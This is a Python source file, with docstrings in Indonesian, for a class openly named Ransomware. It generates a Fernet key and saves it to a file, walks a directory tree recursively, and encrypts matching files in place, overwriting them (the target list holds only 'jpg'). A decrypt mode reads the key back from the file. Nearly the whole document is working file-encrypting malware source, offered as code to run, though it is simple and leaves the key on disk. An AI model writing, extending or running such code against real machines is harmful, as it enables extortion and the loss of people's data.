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os.path import expanduser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cryptography.fernet import Fernet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Ransomware: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key=None):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Menginisialisasi instance kelas Ransomware.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kunci: Kunci AES 128-bit yang digunakan untuk mengenkripsi atau mendekripsi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Atribut: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cryptor:fernet.Fernet: Objek dengan metode enkripsi dan dekripsi, atur kapan kunci dibuat jika kunci tidak diteruskan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file_ext_targets:list&lt;str&gt;: Daftar string ekstensi file yang diizinkan untuk enkripsi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 = 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self.cryptor = None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self.file_ext_targets = ['jpg']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generate_key(self):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Menghasilkan kunci AES 128-bit untuk mengenkripsi file. Menyetel self.cyptor dengan objek Fernet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 = Fernet.generate_key()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self.cryptor = Fernet(self.key)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read_key(self, keyfile_name):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Membaca dalam kunci dari file.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keyfile_name:str: Path ke file yang berisi kunci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open(keyfile_name, 'rb') as f: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self.key = f.read()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self.cryptor = Fernet(self.key)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write_key(self, keyfile_name):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Menulis kunci ke file kunci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print(self.key)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open(keyfile_name, 'wb') as f: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f.write(self.key)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crypt_root(self, root_dir, encrypted=False):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Secara rekursif mengenkripsi atau mendekripsi file dari direktori root dengan ekstensi file yang diizinkan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root_dir:str: Jalur absolut dari direktori tingkat atas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encrypt:bool: Tentukan apakah akan mengenkripsi atau mendekripsi file yang ditemui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root, _, files in os.walk(root_dir):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 in files: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abs_file_path = os.path.join(root, f)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not a file extension target, pass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abs_file_path.split('.')[-1] in self.file_ext_targets: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self.crypt_file(abs_file_path, encrypted=encrypted)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crypt_file(self, file_path, encrypted=False):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Mengenkripsi atau mendekripsi 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file_path:str: Jalur absolut ke file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open(file_path, 'rb+') as f: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_data = f.read()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encrypted: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print(f'File contents pre encryption: {_data}')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self.cryptor.encrypt(_data)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print(f'File contents post encryption: {data}')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self.cryptor.decrypt(_data)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print(f'File content post decryption: {data}')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f.seek(0)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f.write(data)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sys_root = expanduser('~')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local_root = '.'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#rware.generate_key()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#rware.write_key()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argparse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parser.add_argument('--action', required=True)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parser.add_argument('--keyfile')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= args.action.lower()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keyfile = args.keyfile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rware = Ransomware()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action == 'decrypt':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keyfile is None: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print('Path to keyfile must be specified after --keyfile to perform decryption.')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rware.read_key(keyfile)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rware.crypt_root(local_root, encrypted=True)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action == 'encrypt':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rware.generate_key()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rware.write_key('keyfile')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rware.crypt_root(local_root)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